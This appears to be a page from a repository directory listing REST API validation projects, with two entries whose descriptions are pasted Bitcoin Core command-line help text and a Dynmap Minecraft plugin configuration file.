200 skills found · Page 4 of 7
heru299 / Script Copy-? Print this help message and exit -alertnotify=<cmd> Execute command when a relevant alert is received or we see a really long fork (%s in cmd is replaced by message) -assumevalid=<hex> If this block is in the chain assume that it and its ancestors are valid and potentially skip their script verification (0 to verify all, default: 0000000000000000000b9d2ec5a352ecba0592946514a92f14319dc2b367fc72, testnet: 000000000000006433d1efec504c53ca332b64963c425395515b01977bd7b3b0, signet: 0000002a1de0f46379358c1fd09906f7ac59adf3712323ed90eb59e4c183c020) -blockfilterindex=<type> Maintain an index of compact filters by block (default: 0, values: basic). If <type> is not supplied or if <type> = 1, indexes for all known types are enabled. -blocknotify=<cmd> Execute command when the best block changes (%s in cmd is replaced by block hash) -blockreconstructionextratxn=<n> Extra transactions to keep in memory for compact block reconstructions (default: 100) -blocksdir=<dir> Specify directory to hold blocks subdirectory for *.dat files (default: <datadir>) -blocksonly Whether to reject transactions from network peers. Automatic broadcast and rebroadcast of any transactions from inbound peers is disabled, unless the peer has the 'forcerelay' permission. RPC transactions are not affected. (default: 0) -conf=<file> Specify path to read-only configuration file. Relative paths will be prefixed by datadir location. (default: bitcoin.conf) -daemon Run in the background as a daemon and accept commands -datadir=<dir> Specify data directory -dbcache=<n> Maximum database cache size <n> MiB (4 to 16384, default: 450). In addition, unused mempool memory is shared for this cache (see -maxmempool). -debuglogfile=<file> Specify location of debug log file. Relative paths will be prefixed by a net-specific datadir location. (-nodebuglogfile to disable; default: debug.log) -includeconf=<file> Specify additional configuration file, relative to the -datadir path (only useable from configuration file, not command line) -loadblock=<file> Imports blocks from external file on startup -maxmempool=<n> Keep the transaction memory pool below <n> megabytes (default: 300) -maxorphantx=<n> Keep at most <n> unconnectable transactions in memory (default: 100) -mempoolexpiry=<n> Do not keep transactions in the mempool longer than <n> hours (default: 336) -par=<n> Set the number of script verification threads (-8 to 15, 0 = auto, <0 = leave that many cores free, default: 0) -persistmempool Whether to save the mempool on shutdown and load on restart (default: 1) -pid=<file> Specify pid file. Relative paths will be prefixed by a net-specific datadir location. (default: bitcoind.pid) -prune=<n> Reduce storage requirements by enabling pruning (deleting) of old blocks. This allows the pruneblockchain RPC to be called to delete specific blocks, and enables automatic pruning of old blocks if a target size in MiB is provided. This mode is incompatible with -txindex and -rescan. Warning: Reverting this setting requires re-downloading the entire blockchain. (default: 0 = disable pruning blocks, 1 = allow manual pruning via RPC, >=550 = automatically prune block files to stay under the specified target size in MiB) -reindex Rebuild chain state and block index from the blk*.dat files on disk -reindex-chainstate Rebuild chain state from the currently indexed blocks. When in pruning mode or if blocks on disk might be corrupted, use full -reindex instead. -settings=<file> Specify path to dynamic settings data file. Can be disabled with -nosettings. File is written at runtime and not meant to be edited by users (use bitcoin.conf instead for custom settings). Relative paths will be prefixed by datadir location. (default: settings.json) -startupnotify=<cmd> Execute command on startup. -sysperms Create new files with system default permissions, instead of umask 077 (only effective with disabled wallet functionality) -txindex Maintain a full transaction index, used by the getrawtransaction rpc call (default: 0) -version Print version and exit Connection options: -addnode=<ip> Add a node to connect to and attempt to keep the connection open (see the `addnode` RPC command help for more info). This option can be specified multiple times to add multiple nodes. -asmap=<file> Specify asn mapping used for bucketing of the peers (default: ip_asn.map). Relative paths will be prefixed by the net-specific datadir location. -bantime=<n> Default duration (in seconds) of manually configured bans (default: 86400) -bind=<addr>[:<port>][=onion] Bind to given address and always listen on it (default: 0.0.0.0). Use [host]:port notation for IPv6. Append =onion to tag any incoming connections to that address and port as incoming Tor connections (default: 127.0.0.1:8334=onion, testnet: 127.0.0.1:18334=onion, signet: 127.0.0.1:38334=onion, regtest: 127.0.0.1:18445=onion) -connect=<ip> Connect only to the specified node; -noconnect disables automatic connections (the rules for this peer are the same as for -addnode). This option can be specified multiple times to connect to multiple nodes. -discover Discover own IP addresses (default: 1 when listening and no -externalip or -proxy) -dns Allow DNS lookups for -addnode, -seednode and -connect (default: 1) -dnsseed Query for peer addresses via DNS lookup, if low on addresses (default: 1 unless -connect used) -externalip=<ip> Specify your own public address -forcednsseed Always query for peer addresses via DNS lookup (default: 0) -listen Accept connections from outside (default: 1 if no -proxy or -connect) -listenonion Automatically create Tor onion service (default: 1) -maxconnections=<n> Maintain at most <n> connections to peers (default: 125) -maxreceivebuffer=<n> Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000) -maxsendbuffer=<n> Maximum per-connection send buffer, <n>*1000 bytes (default: 1000) -maxtimeadjustment Maximum allowed median peer time offset adjustment. Local perspective of time may be influenced by peers forward or backward by this amount. (default: 4200 seconds) -maxuploadtarget=<n> Tries to keep outbound traffic under the given target (in MiB per 24h). Limit does not apply to peers with 'download' permission. 0 = no limit (default: 0) -networkactive Enable all P2P network activity (default: 1). Can be changed by the setnetworkactive RPC command -onion=<ip:port> Use separate SOCKS5 proxy to reach peers via Tor onion services, set -noonion to disable (default: -proxy) -onlynet=<net> Make outgoing connections only through network <net> (ipv4, ipv6 or onion). Incoming connections are not affected by this option. This option can be specified multiple times to allow multiple networks. -peerblockfilters Serve compact block filters to peers per BIP 157 (default: 0) -peerbloomfilters Support filtering of blocks and transaction with bloom filters (default: 0) -permitbaremultisig Relay non-P2SH multisig (default: 1) -port=<port> Listen for connections on <port>. Nodes not using the default ports (default: 8333, testnet: 18333, signet: 38333, regtest: 18444) are unlikely to get incoming connections. -proxy=<ip:port> Connect through SOCKS5 proxy, set -noproxy to disable (default: disabled) -proxyrandomize Randomize credentials for every proxy connection. This enables Tor stream isolation (default: 1) -seednode=<ip> Connect to a node to retrieve peer addresses, and disconnect. This option can be specified multiple times to connect to multiple nodes. -timeout=<n> Specify connection timeout in milliseconds (minimum: 1, default: 5000) -torcontrol=<ip>:<port> Tor control port to use if onion listening enabled (default: 127.0.0.1:9051) -torpassword=<pass> Tor control port password (default: empty) -upnp Use UPnP to map the listening port (default: 0) -whitebind=<[permissions@]addr> Bind to the given address and add permission flags to the peers connecting to it. Use [host]:port notation for IPv6. Allowed permissions: bloomfilter (allow requesting BIP37 filtered blocks and transactions), noban (do not ban for misbehavior; implies download), forcerelay (relay transactions that are already in the mempool; implies relay), relay (relay even in -blocksonly mode, and unlimited transaction announcements), mempool (allow requesting BIP35 mempool contents), download (allow getheaders during IBD, no disconnect after maxuploadtarget limit), addr (responses to GETADDR avoid hitting the cache and contain random records with the most up-to-date info). Specify multiple permissions separated by commas (default: download,noban,mempool,relay). Can be specified multiple times. -whitelist=<[permissions@]IP address or network> Add permission flags to the peers connecting from the given IP address (e.g. 1.2.3.4) or CIDR-notated network (e.g. 1.2.3.0/24). Uses the same permissions as -whitebind. Can be specified multiple times. Wallet options: -addresstype What type of addresses to use ("legacy", "p2sh-segwit", or "bech32", default: "bech32") -avoidpartialspends Group outputs by address, selecting all or none, instead of selecting on a per-output basis. Privacy is improved as an address is only used once (unless someone sends to it after spending from it), but may result in slightly higher fees as suboptimal coin selection may result due to the added limitation (default: 0 (always enabled for wallets with "avoid_reuse" enabled)) -changetype What type of change to use ("legacy", "p2sh-segwit", or "bech32"). Default is same as -addresstype, except when -addresstype=p2sh-segwit a native segwit output is used when sending to a native segwit address) -disablewallet Do not load the wallet and disable wallet RPC calls -discardfee=<amt> The fee rate (in BTC/kB) that indicates your tolerance for discarding change by adding it to the fee (default: 0.0001). Note: An output is discarded if it is dust at this rate, but we will always discard up to the dust relay fee and a discard fee above that is limited by the fee estimate for the longest target -fallbackfee=<amt> A fee rate (in BTC/kB) that will be used when fee estimation has insufficient data. 0 to entirely disable the fallbackfee feature. (default: 0.00) -keypool=<n> Set key pool size to <n> (default: 1000). Warning: Smaller sizes may increase the risk of losing funds when restoring from an old backup, if none of the addresses in the original keypool have been used. -maxapsfee=<n> Spend up to this amount in additional (absolute) fees (in BTC) if it allows the use of partial spend avoidance (default: 0.00) -mintxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for transaction creation (default: 0.00001) -paytxfee=<amt> Fee (in BTC/kB) to add to transactions you send (default: 0.00) -rescan Rescan the block chain for missing wallet transactions on startup -spendzeroconfchange Spend unconfirmed change when sending transactions (default: 1) -txconfirmtarget=<n> If paytxfee is not set, include enough fee so transactions begin confirmation on average within n blocks (default: 6) -wallet=<path> Specify wallet path to load at startup. Can be used multiple times to load multiple wallets. Path is to a directory containing wallet data and log files. If the path is not absolute, it is interpreted relative to <walletdir>. This only loads existing wallets and does not create new ones. For backwards compatibility this also accepts names of existing top-level data files in <walletdir>. -walletbroadcast Make the wallet broadcast transactions (default: 1) -walletdir=<dir> Specify directory to hold wallets (default: <datadir>/wallets if it exists, otherwise <datadir>) -walletnotify=<cmd> Execute command when a wallet transaction changes. %s in cmd is replaced by TxID and %w is replaced by wallet name. %w is not currently implemented on windows. On systems where %w is supported, it should NOT be quoted because this would break shell escaping used to invoke the command. -walletrbf Send transactions with full-RBF opt-in enabled (RPC only, default: 0) ZeroMQ notification options: -zmqpubhashblock=<address> Enable publish hash block in <address> -zmqpubhashblockhwm=<n> Set publish hash block outbound message high water mark (default: 1000) -zmqpubhashtx=<address> Enable publish hash transaction in <address> -zmqpubhashtxhwm=<n> Set publish hash transaction outbound message high water mark (default: 1000) -zmqpubrawblock=<address> Enable publish raw block in <address> -zmqpubrawblockhwm=<n> Set publish raw block outbound message high water mark (default: 1000) -zmqpubrawtx=<address> Enable publish raw transaction in <address> -zmqpubrawtxhwm=<n> Set publish raw transaction outbound message high water mark (default: 1000) -zmqpubsequence=<address> Enable publish hash block and tx sequence in <address> -zmqpubsequencehwm=<n> Set publish hash sequence message high water mark (default: 1000) Debugging/Testing options: -debug=<category> Output debugging information (default: -nodebug, supplying <category> is optional). If <category> is not supplied or if <category> = 1, output all debugging information. <category> can be: net, tor, mempool, http, bench, zmq, walletdb, rpc, estimatefee, addrman, selectcoins, reindex, cmpctblock, rand, prune, proxy, mempoolrej, libevent, coindb, qt, leveldb, validation. -debugexclude=<category> Exclude debugging information for a category. Can be used in conjunction with -debug=1 to output debug logs for all categories except one or more specified categories. -help-debug Print help message with debugging options and exit -logips Include IP addresses in debug output (default: 0) -logthreadnames Prepend debug output with name of the originating thread (only available on platforms supporting thread_local) (default: 0) -logtimestamps Prepend debug output with timestamp (default: 1) -maxtxfee=<amt> Maximum total fees (in BTC) to use in a single wallet transaction; setting this too low may abort large transactions (default: 0.10) -printtoconsole Send trace/debug info to console (default: 1 when no -daemon. To disable logging to file, set -nodebuglogfile) -shrinkdebugfile Shrink debug.log file on client startup (default: 1 when no -debug) -uacomment=<cmt> Append comment to the user agent string Chain selection options: -chain=<chain> Use the chain <chain> (default: main). Allowed values: main, test, signet, regtest -signet Use the signet chain. Equivalent to -chain=signet. Note that the network is defined by the -signetchallenge parameter -signetchallenge Blocks must satisfy the given script to be considered valid (only for signet networks; defaults to the global default signet test network challenge) -signetseednode Specify a seed node for the signet network, in the hostname[:port] format, e.g. sig.net:1234 (may be used multiple times to specify multiple seed nodes; defaults to the global default signet test network seed node(s)) -testnet Use the test chain. Equivalent to -chain=test. Node relay options: -bytespersigop Equivalent bytes per sigop in transactions for relay and mining (default: 20) -datacarrier Relay and mine data carrier transactions (default: 1) -datacarriersize Maximum size of data in data carrier transactions we relay and mine (default: 83) -minrelaytxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for relaying, mining and transaction creation (default: 0.00001) -whitelistforcerelay Add 'forcerelay' permission to whitelisted inbound peers with default permissions. This will relay transactions even if the transactions were already in the mempool. (default: 0) -whitelistrelay Add 'relay' permission to whitelisted inbound peers with default permissions. This will accept relayed transactions even when not relaying transactions (default: 1) Block creation options: -blockmaxweight=<n> Set maximum BIP141 block weight (default: 3996000) -blockmintxfee=<amt> Set lowest fee rate (in BTC/kB) for transactions to be included in block creation. (default: 0.00001) RPC server options: -rest Accept public REST requests (default: 0) -rpcallowip=<ip> Allow JSON-RPC connections from specified source. Valid for <ip> are a single IP (e.g. 1.2.3.4), a network/netmask (e.g. 1.2.3.4/255.255.255.0) or a network/CIDR (e.g. 1.2.3.4/24). This option can be specified multiple times -rpcauth=<userpw> Username and HMAC-SHA-256 hashed password for JSON-RPC connections. The field <userpw> comes in the format: <USERNAME>:<SALT>$<HASH>. A canonical python script is included in share/rpcauth. The client then connects normally using the rpcuser=<USERNAME>/rpcpassword=<PASSWORD> pair of arguments. This option can be specified multiple times -rpcbind=<addr>[:port] Bind to given address to listen for JSON-RPC connections. Do not expose the RPC server to untrusted networks such as the public internet! This option is ignored unless -rpcallowip is also passed. Port is optional and overrides -rpcport. Use [host]:port notation for IPv6. This option can be specified multiple times (default: 127.0.0.1 and ::1 i.e., localhost) -rpccookiefile=<loc> Location of the auth cookie. Relative paths will be prefixed by a net-specific datadir location. (default: data dir) -rpcpassword=<pw> Password for JSON-RPC connections -rpcport=<port> Listen for JSON-RPC connections on <port> (default: 8332, testnet: 18332, signet: 38332, regtest: 18443) -rpcserialversion Sets the serialization of raw transaction or block hex returned in non-verbose mode, non-segwit(0) or segwit(1) (default: 1) -rpcthreads=<n> Set the number of threads to service RPC calls (default: 4) -rpcuser=<user> Username for JSON-RPC connections -rpcwhitelist=<whitelist> Set a whitelist to filter incoming RPC calls for a specific user. The field <whitelist> comes in the format: <USERNAME>:<rpc 1>,<rpc 2>,...,<rpc n>. If multiple whitelists are set for a given user, they are set-intersected. See -rpcwhitelistdefault documentation for information on default whitelist behavior. -rpcwhitelistdefault Sets default behavior for rpc whitelisting. Unless rpcwhitelistdefault is set to 0, if any -rpcwhitelist is set, the rpc server acts as if all rpc users are subject to empty-unless-otherwise-specified whitelists. If rpcwhitelistdefault is set to 1 and no -rpcwhitelist is set, rpc server acts as if all rpc users are subject to empty whitelists. -server Accept command line and JSON-RPC commands ~ $
overdatum / DomainAuthorisation, Validation, Database interaction, REST API(JSON over HTTP)
baijijs / BaijiA powerful and customizable Rest API framework built on top of express, supports validations, sanitizers, api presenters e.g.
NikitaZakharov / Django PandasioDataFrames serialization and validation using django-rest-framework serializer interface
mhsiddiqui / Dj Rest FiltersA Generic System to validate query params and filter data in Django Rest Framework
PasinduOG / Api ResponseA lightweight, production-ready Spring Boot library to standardize REST API responses and Global Exception Handling (RFC Standard). Includes automatic timestamps and validation support.
benwoody / Validate ParamsEasy REST query validations in Rails
sathish-dhana / Amazon Java Backend ProjectWe were a team of 4 from the Masai Web-15 batch. We worked on creating REST API and writing business logic for an E-commerce application. Our project performs fundamental operations of an e-commerce website, where our customer's data is validated, mapped, processed with business logic & persisted in the database.
bezkoder / Spring Boot Custom ValidationCustom Validation in Spring Boot example - Spring Boot custom validation annotation example - Spring Boot Rest API Validation
Nixy1234 / Dfdfd# All paths in this configuration file are relative to Dynmap's data-folder: minecraft_server/dynmap/ # All map templates are defined in the templates directory # To use the HDMap very-low-res (2 ppb) map templates as world defaults, set value to vlowres # The definitions of these templates are in normal-vlowres.txt, nether-vlowres.txt, and the_end-vlowres.txt # To use the HDMap low-res (4 ppb) map templates as world defaults, set value to lowres # The definitions of these templates are in normal-lowres.txt, nether-lowres.txt, and the_end-lowres.txt # To use the HDMap hi-res (16 ppb) map templates (these can take a VERY long time for initial fullrender), set value to hires # The definitions of these templates are in normal-hires.txt, nether-hires.txt, and the_end-hires.txt # To use the HDMap low-res (4 ppb) map templates, with support for boosting resolution selectively to hi-res (16 ppb), set value to low_boost_hi # The definitions of these templates are in normal-low_boost_hi.txt, nether-low_boost_hi.txt, and the_end-low_boost_hi.txt # To use the HDMap hi-res (16 ppb) map templates, with support for boosting resolution selectively to vhi-res (32 ppb), set value to hi_boost_vhi # The definitions of these templates are in normal-hi_boost_vhi.txt, nether-hi_boost_vhi.txt, and the_end-hi_boost_vhi.txt # To use the HDMap hi-res (16 ppb) map templates, with support for boosting resolution selectively to xhi-res (64 ppb), set value to hi_boost_xhi # The definitions of these templates are in normal-hi_boost_xhi.txt, nether-hi_boost_xhi.txt, and the_end-hi_boost_xhi.txt deftemplatesuffix: lowres # Map storage scheme: only uncommoent one 'type' value # filetree: classic and default scheme: tree of files, with all map data under the directory indicated by 'tilespath' setting # sqlite: single SQLite database file (this can get VERY BIG), located at 'dbfile' setting (default is file dynmap.db in data directory) # mysql: MySQL database, at hostname:port in database, accessed via userid with password # mariadb: MariaDB database, at hostname:port in database, accessed via userid with password # postgres: PostgreSQL database, at hostname:port in database, accessed via userid with password storage: # Filetree storage (standard tree of image files for maps) type: filetree # SQLite db for map storage (uses dbfile as storage location) #type: sqlite #dbfile: dynmap.db # MySQL DB for map storage (at 'hostname':'port' in database 'database' using user 'userid' password 'password' and table prefix 'prefix' #type: mysql #hostname: localhost #port: 3306 #database: dynmap #userid: dynmap #password: dynmap #prefix: "" components: - class: org.dynmap.ClientConfigurationComponent - class: org.dynmap.InternalClientUpdateComponent sendhealth: true sendposition: true allowwebchat: true webchat-interval: 5 hidewebchatip: false trustclientname: false includehiddenplayers: false # (optional) if true, color codes in player display names are used use-name-colors: false # (optional) if true, player login IDs will be used for web chat when their IPs match use-player-login-ip: true # (optional) if use-player-login-ip is true, setting this to true will cause chat messages not matching a known player IP to be ignored require-player-login-ip: false # (optional) block player login IDs that are banned from chatting block-banned-player-chat: true # Require login for web-to-server chat (requires login-enabled: true) webchat-requires-login: false # If set to true, users must have dynmap.webchat permission in order to chat webchat-permissions: false # Limit length of single chat messages chatlengthlimit: 256 # # Optional - make players hidden when they are inside/underground/in shadows (#=light level: 0=full shadow,15=sky) # hideifshadow: 4 # # Optional - make player hidden when they are under cover (#=sky light level,0=underground,15=open to sky) # hideifundercover: 14 # # (Optional) if true, players that are crouching/sneaking will be hidden hideifsneaking: false # If true, player positions/status is protected (login with ID with dynmap.playermarkers.seeall permission required for info other than self) protected-player-info: false # If true, hide players with invisibility potion effects active hide-if-invisiblity-potion: true # If true, player names are not shown on map, chat, list hidenames: false #- class: org.dynmap.JsonFileClientUpdateComponent # writeinterval: 1 # sendhealth: true # sendposition: true # allowwebchat: true # webchat-interval: 5 # hidewebchatip: false # includehiddenplayers: false # use-name-colors: false # use-player-login-ip: false # require-player-login-ip: false # block-banned-player-chat: true # hideifshadow: 0 # hideifundercover: 0 # hideifsneaking: false # # Require login for web-to-server chat (requires login-enabled: true) # webchat-requires-login: false # # If set to true, users must have dynmap.webchat permission in order to chat # webchat-permissions: false # # Limit length of single chat messages # chatlengthlimit: 256 # hide-if-invisiblity-potion: true # hidenames: false - class: org.dynmap.SimpleWebChatComponent allowchat: true # If true, web UI users can supply name for chat using 'playername' URL parameter. 'trustclientname' must also be set true. allowurlname: false # Note: this component is needed for the dmarker commands, and for the Marker API to be available to other plugins - class: org.dynmap.MarkersComponent type: markers showlabel: false enablesigns: false # Default marker set for sign markers default-sign-set: markers # (optional) add spawn point markers to standard marker layer showspawn: true spawnicon: world spawnlabel: "Spawn" # (optional) layer for showing offline player's positions (for 'maxofflinetime' minutes after logoff) showofflineplayers: false offlinelabel: "Offline" offlineicon: offlineuser offlinehidebydefault: true offlineminzoom: 0 maxofflinetime: 30 # (optional) layer for showing player's spawn beds showspawnbeds: false spawnbedlabel: "Spawn Beds" spawnbedicon: bed spawnbedhidebydefault: true spawnbedminzoom: 0 spawnbedformat: "%name%'s bed" # (optional) Show world border (vanilla 1.8+) showworldborder: true worldborderlabel: "Border" - class: org.dynmap.ClientComponent type: chat allowurlname: false - class: org.dynmap.ClientComponent type: chatballoon focuschatballoons: false - class: org.dynmap.ClientComponent type: chatbox showplayerfaces: true messagettl: 5 # Optional: set number of lines in scrollable message history: if set, messagettl is not used to age out messages #scrollback: 100 # Optional: set maximum number of lines visible for chatbox #visiblelines: 10 # Optional: send push button sendbutton: false - class: org.dynmap.ClientComponent type: playermarkers showplayerfaces: true showplayerhealth: true # If true, show player body too (only valid if showplayerfaces=true showplayerbody: false # Option to make player faces small - don't use with showplayerhealth smallplayerfaces: false # Optional - make player faces layer hidden by default hidebydefault: false # Optional - ordering priority in layer menu (low goes before high - default is 0) layerprio: 0 # Optional - label for player marker layer (default is 'Players') label: "Players" #- class: org.dynmap.ClientComponent # type: digitalclock - class: org.dynmap.ClientComponent type: link - class: org.dynmap.ClientComponent type: timeofdayclock showdigitalclock: true #showweather: true # Mouse pointer world coordinate display - class: org.dynmap.ClientComponent type: coord label: "Location" hidey: false show-mcr: false show-chunk: false # Note: more than one logo component can be defined #- class: org.dynmap.ClientComponent # type: logo # text: "Dynmap" # #logourl: "images/block_surface.png" # linkurl: "http://forums.bukkit.org/threads/dynmap.489/" # # Valid positions: top-left, top-right, bottom-left, bottom-right # position: bottom-right #- class: org.dynmap.ClientComponent # type: inactive # timeout: 1800 # in seconds (1800 seconds = 30 minutes) # redirecturl: inactive.html # #showmessage: 'You were inactive for too long.' #- class: org.dynmap.TestComponent # stuff: "This is some configuration-value" # Treat hiddenplayers.txt as a whitelist for players to be shown on the map? (Default false) display-whitelist: false # How often a tile gets rendered (in seconds). renderinterval: 1 # How many tiles on update queue before accelerate render interval renderacceleratethreshold: 60 # How often to render tiles when backlog is above renderacceleratethreshold renderaccelerateinterval: 0.2 # How many update tiles to work on at once (if not defined, default is 1/2 the number of cores) tiles-rendered-at-once: 2 # If true, use normal priority threads for rendering (versus low priority) - this can keep rendering # from starving on busy Windows boxes (Linux JVMs pretty much ignore thread priority), but may result # in more competition for CPU resources with other processes usenormalthreadpriority: true # Save and restore pending tile renders - prevents their loss on server shutdown or /reload saverestorepending: true # Save period for pending jobs (in seconds): periodic saving for crash recovery of jobs save-pending-period: 900 # Zoom-out tile update period - how often to scan for and process tile updates into zoom-out tiles (in seconds) zoomoutperiod: 30 # Control whether zoom out tiles are validated on startup (can be needed if zoomout processing is interrupted, but can be expensive on large maps) initial-zoomout-validate: true # Default delay on processing of updated tiles, in seconds. This can reduce potentially expensive re-rendering # of frequently updated tiles (such as due to machines, pistons, quarries or other automation). Values can # also be set on individual worlds and individual maps. tileupdatedelay: 30 # Tile hashing is used to minimize tile file updates when no changes have occurred - set to false to disable enabletilehash: true # Optional - hide ores: render as normal stone (so that they aren't revealed by maps) #hideores: true # Optional - enabled BetterGrass style rendering of grass and snow block sides #better-grass: true # Optional - enable smooth lighting by default on all maps supporting it (can be set per map as lighting option) smooth-lighting: true # Optional - use world provider lighting table (good for custom worlds with custom lighting curves, like nether) # false=classic Dynmap lighting curve use-brightness-table: true # Optional - render specific block names using the textures and models of another block name: can be used to hide/disguise specific # blocks (e.g. make ores look like stone, hide chests) or to provide simple support for rendering unsupported custom blocks block-alias: # "minecraft:quartz_ore": "stone" # "diamond_ore": "coal_ore" # Default image format for HDMaps (png, jpg, jpg-q75, jpg-q80, jpg-q85, jpg-q90, jpg-q95, jpg-q100, webp, webp-q75, webp-q80, webp-q85, webp-q90, webp-q95, webp-q100), # Note: any webp format requires the presence of the 'webp command line tools' (cwebp, dwebp) (https://developers.google.com/speed/webp/download) # # Has no effect on maps with explicit format settings image-format: jpg-q90 # If cwebp or dwebp are not on the PATH, use these settings to provide their full path. Do not use these settings if the tools are on the PATH # For Windows, include .exe # #cwebpPath: /usr/bin/cwebp #dwebpPath: /usr/bin/dwebp # use-generated-textures: if true, use generated textures (same as client); false is static water/lava textures # correct-water-lighting: if true, use corrected water lighting (same as client); false is legacy water (darker) # transparent-leaves: if true, leaves are transparent (lighting-wise): false is needed for some Spout versions that break lighting on leaf blocks use-generated-textures: true correct-water-lighting: true transparent-leaves: true # ctm-support: if true, Connected Texture Mod (CTM) in texture packs is enabled (default) ctm-support: true # custom-colors-support: if true, Custom Colors in texture packs is enabled (default) custom-colors-support: true # Control loading of player faces (if set to false, skins are never fetched) #fetchskins: false # Control updating of player faces, once loaded (if faces are being managed by other apps or manually) #refreshskins: false # Customize URL used for fetching player skins (%player% is macro for name) skin-url: "http://skins.minecraft.net/MinecraftSkins/%player%.png" # Control behavior for new (1.0+) compass orientation (sunrise moved 90 degrees: east is now what used to be south) # default is 'newrose' (preserve pre-1.0 maps, rotate rose) # 'newnorth' is used to rotate maps and rose (requires fullrender of any HDMap map - same as 'newrose' for FlatMap or KzedMap) compass-mode: newnorth # Triggers for automatic updates : blockupdate-with-id is debug for breaking down updates by ID:meta # To disable, set just 'none' and comment/delete the rest render-triggers: - blockupdate #- blockupdate-with-id #- lightingupdate - chunkpopulate - chunkgenerate #- none # Title for the web page - if not specified, defaults to the server's name (unless it is the default of 'Unknown Server') #webpage-title: "My Awesome Server Map" # The path where the tile-files are placed. tilespath: web/tiles # The path where the web-files are located. webpath: web # The path were the /dynmapexp command exports OBJ ZIP files exportpath: export # The network-interface the webserver will bind to (0.0.0.0 for all interfaces, 127.0.0.1 for only local access). # If not set, uses same setting as server in server.properties (or 0.0.0.0 if not specified) #webserver-bindaddress: 0.0.0.0 # The TCP-port the webserver will listen on. webserver-port: 8123 # Maximum concurrent session on internal web server - limits resources used in Bukkit server max-sessions: 30 # Disables Webserver portion of Dynmap (Advanced users only) disable-webserver: false # Enable/disable having the web server allow symbolic links (true=compatible with existing code, false=more secure (default)) allow-symlinks: true # Enable login support login-enabled: false # Require login to access website (requires login-enabled: true) login-required: false # Period between tile renders for fullrender, in seconds (non-zero to pace fullrenders, lessen CPU load) timesliceinterval: 0.0 # Maximum chunk loads per server tick (1/20th of a second) - reducing this below 90 will impact render performance, but also will reduce server thread load maxchunkspertick: 200 # Progress report interval for fullrender/radiusrender, in tiles. Must be 100 or greater progressloginterval: 100 # Parallel fullrender: if defined, number of concurrent threads used for fullrender or radiusrender # Note: setting this will result in much more intensive CPU use, some additional memory use. Caution should be used when # setting this to equal or exceed the number of physical cores on the system. #parallelrendercnt: 4 # Interval the browser should poll for updates. updaterate: 2000 # If nonzero, server will pause fullrender/radiusrender processing when 'fullrenderplayerlimit' or more users are logged in fullrenderplayerlimit: 0 # If nonzero, server will pause update render processing when 'updateplayerlimit' or more users are logged in updateplayerlimit: 0 # Target limit on server thread use - msec per tick per-tick-time-limit: 50 # If TPS of server is below this setting, update renders processing is paused update-min-tps: 18.0 # If TPS of server is below this setting, full/radius renders processing is paused fullrender-min-tps: 18.0 # If TPS of server is below this setting, zoom out processing is paused zoomout-min-tps: 18.0 showplayerfacesinmenu: true # Control whether players that are hidden or not on current map are grayed out (true=yes) grayplayerswhenhidden: true # Set sidebaropened: 'true' to pin menu sidebar opened permanently, 'pinned' to default the sidebar to pinned, but allow it to unpin #sidebaropened: true # Customized HTTP response headers - add 'id: value' pairs to all HTTP response headers (internal web server only) #http-response-headers: # Access-Control-Allow-Origin: "my-domain.com" # X-Custom-Header-Of-Mine: "MyHeaderValue" # Trusted proxies for web server - which proxy addresses are trusted to supply valid X-Forwarded-For fields trusted-proxies: - "127.0.0.1" - "0:0:0:0:0:0:0:1" joinmessage: "%playername% joined" quitmessage: "%playername% quit" spammessage: "You may only chat once every %interval% seconds." # format for messages from web: %playername% substitutes sender ID (typically IP), %message% includes text webmsgformat: "&color;2[WEB] %playername%: &color;f%message%" # Control whether layer control is presented on the UI (default is true) showlayercontrol: true # Enable checking for banned IPs via banned-ips.txt (internal web server only) check-banned-ips: true # Default selection when map page is loaded defaultzoom: 0 defaultworld: world defaultmap: flat # (optional) Zoom level and map to switch to when following a player, if possible #followzoom: 3 #followmap: surface # If true, make persistent record of IP addresses used by player logins, to support web IP to player matching persist-ids-by-ip: true # If true, map text to cyrillic cyrillic-support: false # Messages to customize msg: maptypes: "Map Types" players: "Players" chatrequireslogin: "Chat Requires Login" chatnotallowed: "You are not permitted to send chat messages" hiddennamejoin: "Player joined" hiddennamequit: "Player quit" # URL for client configuration (only need to be tailored for proxies or other non-standard configurations) url: # configuration URL #configuration: "up/configuration" # update URL #update: "up/world/{world}/{timestamp}" # sendmessage URL #sendmessage: "up/sendmessage" # login URL #login: "up/login" # register URL #register: "up/register" # tiles base URL #tiles: "tiles/" # markers base URL #markers: "tiles/" # Snapshot cache size, in chunks snapshotcachesize: 500 # Snapshot cache uses soft references (true), else weak references (false) soft-ref-cache: true # Player enter/exit title messages for map markers # # Processing period - how often to check player positions vs markers - default is 1000ms (1 second) #enterexitperiod: 1000 # Title message fade in time, in ticks (0.05 second intervals) - default is 10 (1/2 second) #titleFadeIn: 10 # Title message stay time, in ticks (0.05 second intervals) - default is 70 (3.5 seconds) #titleStay: 70 # Title message fade out time, in ticks (0.05 seocnd intervals) - default is 20 (1 second) #titleFadeOut: 20 # Enter/exit messages use on screen titles (true - default), if false chat messages are sent instead #enterexitUseTitle: true # Set true if new enter messages should supercede pending exit messages (vs being queued in order), default false #enterReplacesExits: true # Set to true to enable verbose startup messages - can help with debugging map configuration problems # Set to false for a much quieter startup log verbose: false # Enables debugging. #debuggers: # - class: org.dynmap.debug.LogDebugger # Debug: dump blocks missing render data dump-missing-blocks: false
ReadableRegex / ReadableRegexREST API To Transform and Validate Data Easily, Anywhere, Without Regex
cassiomolin / Tasks Rest ApiSample REST API for managing tasks using Spring Boot, Jersey, Jackson, MapStruct, Hibernate Validator and REST Assured.
iron-bound-designs / Wp Rest Api Schema ValidatorValidate WP REST API requests using a complete JSON Schema validator.
AamirSohail763 / Online Food Delivery AppA SpringBoot project which provides REST API for an Online Food Delivery application. This API performs all the fundamental CRUD operations of any Online Food Delivery platform with user validation at every step.
sudowing / Service EngineGeneralized service engine that auto provisions REST, GraphQL & gRPC services that support CRUD operations with full validation to tables, views and materialized views of several popular databases.
max-passion / Fastapi Issue TrackerA mini production-style REST API built with FastAPI for tracking issues. This project demonstrates core FastAPI concepts including routing, data validation with Pydantic, CRUD operations, and file-based persistence.
